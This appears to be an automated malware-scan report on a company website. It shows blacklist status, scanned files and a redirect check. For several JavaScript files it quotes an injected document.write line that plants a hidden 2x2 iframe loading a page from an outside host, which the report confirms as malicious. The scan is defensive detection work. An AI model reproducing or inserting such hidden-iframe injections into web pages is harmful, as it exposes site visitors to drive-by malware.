Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=exantvisualizer.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.exantvisualizer.com/ | 200 OK Content-Length: 49717 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: exant.co.in ...[3039 bytes skipped]... lass="footer" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; font-weight:normal;">Contact Us</a> </td> </tr> <tr> <td colspan="3" align="left" valign="bottom"> <span class="footer"> © Copyright 2010 <a class="link" target="_blank" href="http://www.exant.co.in" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px; font-weight:normal;">eXant Technologies Pvt. Ltd.</a> All rights reserved to the trademarks of their respective owners</span> <br /><br /> </td> </tr> </table> </td> </tr> </tab ...[679 bytes skipped]... | ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://www.exantvisualizer.com/Scripts/fadeslideshow.js | 200 OK Content-Length: 15573 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790></iframe>');
var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=nu .appendTo(setting.$wrapperdiv) } }, getCookie: function(Name) { var re = new RegExp(Name + "=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null }, setCookie: function(name, value) { document.cookie = name + "=" + value + ";path=/" } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://marko.lotoshosting.com/czhd.html?j=734790 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790> | ||
http://www.exantvisualizer.com/Scripts/dhtmlwindow.js | 200 OK Content-Length: 18875 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790></iframe>');
var dhtmlwindow={ imagefiles: ['../images/min.gif', '../images/close_box.gif', '../images/restore.gif', '../images/resize.gif'], ajaxbustcache: true, ajaxloadinghtml: '<b>Loading Page. Please wait...</b>', minimizeorder: 0, zIndexvalue:1007, tobjects: [], lastactivet: {}, < target.attachEvent(tasktype, functionref) }, cleanup:function(){ for (var i=0; i<dhtmlwindow.tobjects.length; i++){ dhtmlwindow.tobjects[i].handle._parent=dhtmlwindow.tobjects[i].resizearea._parent=dhtmlwindow.tobjects[i].controls._parent=null } window.onload=null } } document.write('<div id="dhtmlwindowholder"><span style="display:none">.</span></div>') window.onunload=dhtmlwindow.cleanup Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://marko.lotoshosting.com/czhd.html?j=734790 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790> | ||
http://www.exantvisualizer.com/Scripts/modal.js | 200 OK Content-Length: 3526 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790></iframe>');
if (typeof dhtmlwindow=="undefined") alert('ERROR: Modal Window script requires all files from "DHTML Window widget" in order to work!') var dhtmlmodal={ veilstack: 0, open:function(t, contenttype, contentsource, title, attr, recalonload){ var d=dhtmlwindow this.interVeil=do t.onclose=function(){return true} if (dhtmlwindow.close(t)) this.closeveil() }, show:function(t){ dhtmlmodal.veilstack++ dhtmlmodal.loadveil() dhtmlwindow.show(t) } } document.write('<div id="interVeil"></div>') dhtmlwindow.addEvent(window, function(){if (typeof dhtmlmodal!="undefined") dhtmlmodal.adjustveil()}, "resize") Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://marko.lotoshosting.com/czhd.html?j=734790 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790> | ||
http://www.exantvisualizer.com/WebResource.axd?d=526WD0NnV2H2SWnbWyucTQbePaOCBcTWEunySfm7lWmouNsbpLAvKYcKd1JjqqTSzfH5oJRuTe8YNV-b0RQHpR_YAEw1&t=635515077060102573 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://www.exantvisualizer.com/WebResource.axd?d=VFIKZ82drJOTHJBf_4ILf-J4yI3GeVcoD5l4cvt9o6pY-bEaU7zm-akpvrRHjbNTYJtx6mDo2TS2G7WoHyHVPx-mr71iURC1vasF2cSk0wqX7yU7KTw4g50-yHxDoVxQChAJ6g2&t=634066480260725148 | 200 OK Content-Length: 2719 Content-Type: application/x-javascript | clean |
http://www.exantvisualizer.com/WebResource.axd?d=kBuOi2j-i5VMIwRHj7yD1azXilmqC7Rd4nYmiA0GKSImqpq7hDYJctvLT0BmoRUn4bTKxVP6SztlVXS5YDdGEK5YJYIfo-tjxDWEuMar7sMBNRwJLGT-nqPCy6DnkTt3MukXqA2&t=634066480260725148 | 200 OK Content-Length: 4961 Content-Type: application/x-javascript | clean |
http://www.exantvisualizer.com/Default.aspx | 200 OK Content-Length: 49717 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: exant.co.in ...[3039 bytes skipped]... lass="footer" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; font-weight:normal;">Contact Us</a> </td> </tr> <tr> <td colspan="3" align="left" valign="bottom"> <span class="footer"> © Copyright 2010 <a class="link" target="_blank" href="http://www.exant.co.in" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px; font-weight:normal;">eXant Technologies Pvt. Ltd.</a> All rights reserved to the trademarks of their respective owners</span> <br /><br /> </td> </tr> </table> </td> </tr> </tab ...[679 bytes skipped]... | ||
http://www.exantvisualizer.com/en-US/Default.aspx | 200 OK Content-Length: 49717 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: exant.co.in ...[3039 bytes skipped]... lass="footer" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; font-weight:normal;">Contact Us</a> </td> </tr> <tr> <td colspan="3" align="left" valign="bottom"> <span class="footer"> © Copyright 2010 <a class="link" target="_blank" href="http://www.exant.co.in" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px; font-weight:normal;">eXant Technologies Pvt. Ltd.</a> All rights reserved to the trademarks of their respective owners</span> <br /><br /> </td> </tr> </table> </td> </tr> </tab ...[679 bytes skipped]... | ||
http://www.exantvisualizer.com/en-US/Scripts/fadeslideshow.js | 200 OK Content-Length: 15573 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790></iframe>');
var fadeSlideShow_descpanel={ controls: [['x.png',7,7], ['restore.png',10,11], ['loading.gif',54,55]], fontStyle: 'normal 11px Verdana', slidespeed: 200 } jQuery.noConflict() function fadeSlideShow(settingarg){ this.setting=settingarg settingarg=nu .appendTo(setting.$wrapperdiv) } }, getCookie: function(Name) { var re = new RegExp(Name + "=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null }, setCookie: function(name, value) { document.cookie = name + "=" + value + ";path=/" } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://marko.lotoshosting.com/czhd.html?j=734790 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790> | ||
http://www.exantvisualizer.com/en-US/Scripts/dhtmlwindow.js | 200 OK Content-Length: 18875 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790></iframe>');
var dhtmlwindow={ imagefiles: ['../images/min.gif', '../images/close_box.gif', '../images/restore.gif', '../images/resize.gif'], ajaxbustcache: true, ajaxloadinghtml: '<b>Loading Page. Please wait...</b>', minimizeorder: 0, zIndexvalue:1007, tobjects: [], lastactivet: {}, < target.attachEvent(tasktype, functionref) }, cleanup:function(){ for (var i=0; i<dhtmlwindow.tobjects.length; i++){ dhtmlwindow.tobjects[i].handle._parent=dhtmlwindow.tobjects[i].resizearea._parent=dhtmlwindow.tobjects[i].controls._parent=null } window.onload=null } } document.write('<div id="dhtmlwindowholder"><span style="display:none">.</span></div>') window.onunload=dhtmlwindow.cleanup Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://marko.lotoshosting.com/czhd.html?j=734790 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790> | ||
http://www.exantvisualizer.com/en-US/Scripts/modal.js | 200 OK Content-Length: 3526 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790></iframe>');
if (typeof dhtmlwindow=="undefined") alert('ERROR: Modal Window script requires all files from "DHTML Window widget" in order to work!') var dhtmlmodal={ veilstack: 0, open:function(t, contenttype, contentsource, title, attr, recalonload){ var d=dhtmlwindow this.interVeil=do t.onclose=function(){return true} if (dhtmlwindow.close(t)) this.closeveil() }, show:function(t){ dhtmlmodal.veilstack++ dhtmlmodal.loadveil() dhtmlwindow.show(t) } } document.write('<div id="interVeil"></div>') dhtmlwindow.addEvent(window, function(){if (typeof dhtmlmodal!="undefined") dhtmlmodal.adjustveil()}, "resize") Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://marko.lotoshosting.com/czhd.html?j=734790 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://marko.lotoshosting.com/czhd.html?j=734790> | ||
http://www.exantvisualizer.com/en-US/Explore-Visualizer.aspx | 200 OK Content-Length: 32750 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: exant.co.in ...[3029 bytes skipped]... lass="footer" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; font-weight:normal;">Contact Us</a> </td> </tr> <tr> <td colspan="3" align="left" valign="bottom"> <span class="footer"> © Copyright 2010 <a class="link" target="_blank" href="http://www.exant.co.in" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px; font-weight:normal;">eXant Technologies Pvt. Ltd.</a> All rights reserved to the trademarks of their respective owners</span> <br /><br /> </td> </tr> </table> </td> </tr> </tab ...[685 bytes skipped]... | ||
http://www.exantvisualizer.com/en-US/eXant-Visualizer-Overview.aspx | 200 OK Content-Length: 36021 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: exant.co.in ...[3029 bytes skipped]... lass="footer" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:10px; font-weight:normal;">Contact Us</a> </td> </tr> <tr> <td colspan="3" align="left" valign="bottom"> <span class="footer"> © Copyright 2010 <a class="link" target="_blank" href="http://www.exant.co.in" style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:9px; font-weight:normal;">eXant Technologies Pvt. Ltd.</a> All rights reserved to the trademarks of their respective owners</span> <br /><br /> </td> </tr> </table> </td> </tr> </tab ...[685 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: exantvisualizer.com
Result:
GET / HTTP/1.1
Host: exantvisualizer.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: exantvisualizer.com
Referer: http://www.google.com/search?q=exantvisualizer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: exantvisualizer.com
Referer: http://www.google.com/search?q=exantvisualizer.com
Result:
The result is similar to the first query. There are no suspicious redirects found.